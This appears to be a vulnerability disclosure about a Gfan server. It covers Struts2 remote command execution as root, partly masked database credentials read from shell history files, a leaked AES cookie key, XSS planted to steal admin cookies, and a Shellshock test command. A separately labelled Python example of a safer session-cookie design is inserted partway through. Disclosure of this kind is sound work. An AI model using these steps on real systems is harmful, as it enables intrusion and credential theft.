Gfan frontend getshell (once again affects the main business of the Gfan network)
Vulnerability details
A Struts2 command execution vulnerability exists at the following URL and can be exploited successfully:
Http://v5op.apk.gfan.com/index.action
WEB directory
/Home/tomcat8088/webapps/ROOT/
Direct GETSHELL, ROOT permission
Website physical path: /home/tomcat8088/webapps/ROOT/
java.home: /usr/lib/jvm/java-6-sun-1.6.0.26/jre
java.version: 1.6.0_26
os.name: Linux
os.arch: amd64
os.version: 2.6.35-22-server
user.name: root
user.home: /root
user.dir: /home/tomcat8088
java.class.version: 50
java.class.path: /home/tomcat8088/bin/bootstrap.jar
java.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/server:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.1-b02
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.6
java.specification.name: Java Platform API Specification
java.io.tmpdir: /home/tomcat8088/temp
Read .mysql_history under /root/:
CHANGE MASTER TO MASTER_HOST='10.*.*.163', MASTER_USER='r**l', MASTER_PASSWORD='A*****h', MASTER_LOG_FILE='mysql-bin.000672', MASTER_LOG_POS=536449400;start slave;
Read .bash_history:
scp w*****g@10.*.*.169:/home/weitong/software/replace.jar .
The /Backup/ directory contains a source code backup of the entire operations back-end.
The cookie encryption method and key are found in the configuration file:
    // Referenced classes of package com.gfan.appmarket.util:
    // AES
    public class CookieUtil {
        public static final String COOKIE_NAME = "admin_passport";
        public static final String COOKIE_AES_KEY = "L9FMH******1jQv";

        public CookieUtil() {
        }
    }
The earlier database leak vulnerability had already exposed part of the admin_user table. Back-end passwords are presumably stored encrypted in the database, so how do we get into the back-end?
During testing of the back-end, I found a user with the password 123456. However, it can only log on and has no permissions.
Checking the history recorded by the tool, one of the redirects goes from index.jsp to index.action.
So start with index.jsp and insert XSS code there. (Every logged-on user passes through this page after login verification before reaching the back-end.)
Cookies arrive soon afterwards.
Enter the back-end.
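The admin_passport cookie above is an AES encryption under a key that sits in the source tree, so anyone holding a copy of the source (the /Backup/ directory, for instance) can compute a valid cookie, and the XSS on index.jsp was enough to steal a live one. The following is an added example, not code from this report or from the gfan code base, of a replacement session cookie that keeps no secret in the source: an opaque random token, stored only as a hash in a server-side table, issued with HttpOnly, Secure and SameSite set. The function names, the 30-minute idle timeout and the in-memory table are assumptions.

```python
import hashlib
import secrets
import time
from http.cookies import SimpleCookie
from typing import Dict, Optional, Tuple

COOKIE_NAME = "admin_passport"   # same cookie name as the CookieUtil fragment
SESSION_TTL = 30 * 60            # assumed 30-minute idle timeout, in seconds

# Server-side session table: sha256(token) -> (admin user, expiry time).
# Only hashes are kept, so a dump of this table (like the earlier admin_user
# leak) yields no usable cookie, and there is no static key to copy from source.
_sessions: Dict[str, Tuple[str, float]] = {}


def _hash(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def issue_session(admin_user: str, now: Optional[float] = None) -> Tuple[str, str]:
    """Create a session after login; return (Set-Cookie header value, raw token)."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)            # 256 random bits from the OS CSPRNG
    _sessions[_hash(token)] = (admin_user, now + SESSION_TTL)
    cookie = SimpleCookie()
    cookie[COOKIE_NAME] = token
    cookie[COOKIE_NAME]["httponly"] = True       # document.cookie cannot read it
    cookie[COOKIE_NAME]["secure"] = True         # never sent over plain HTTP
    cookie[COOKIE_NAME]["samesite"] = "Strict"   # not sent on cross-site requests
    cookie[COOKIE_NAME]["path"] = "/"
    return cookie[COOKIE_NAME].OutputString(), token


def resolve_session(cookie_header: str, now: Optional[float] = None) -> Optional[str]:
    """Map an incoming Cookie header to an admin user, or None if not logged in."""
    now = time.time() if now is None else now
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get(COOKIE_NAME)
    if morsel is None:
        return None
    key = _hash(morsel.value)                    # the table never sees the raw token
    entry = _sessions.get(key)
    if entry is None:
        return None
    user, expires = entry
    if now > expires:                            # idle timeout: drop and reject
        del _sessions[key]
        return None
    return user


def revoke_session(token: str) -> None:
    """Log out: forget the session so the cookie is worthless even if stolen."""
    _sessions.pop(_hash(token), None)
```

Because validity lives in the server table rather than in the cookie's contents, a leaked source backup or database row no longer lets anyone mint or reuse an admin session.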
Server Information:
Linux ubuntu181 2.6.35-22-server #33-Ubuntu SMP Sun Sep 19 20:48:58 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 12.04.4 LTS
Release: 12.04
Codename: precise
This server is also affected by the bash vulnerability:
[/home/tomcat8088/webapps/ROOT/]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
With root permission, the next steps would be privilege escalation, then intranet penetration, then more machines falling. I am not that familiar with Linux privilege escalation, so this is as far as I have tested.
Solution:
Strengthen input filtering.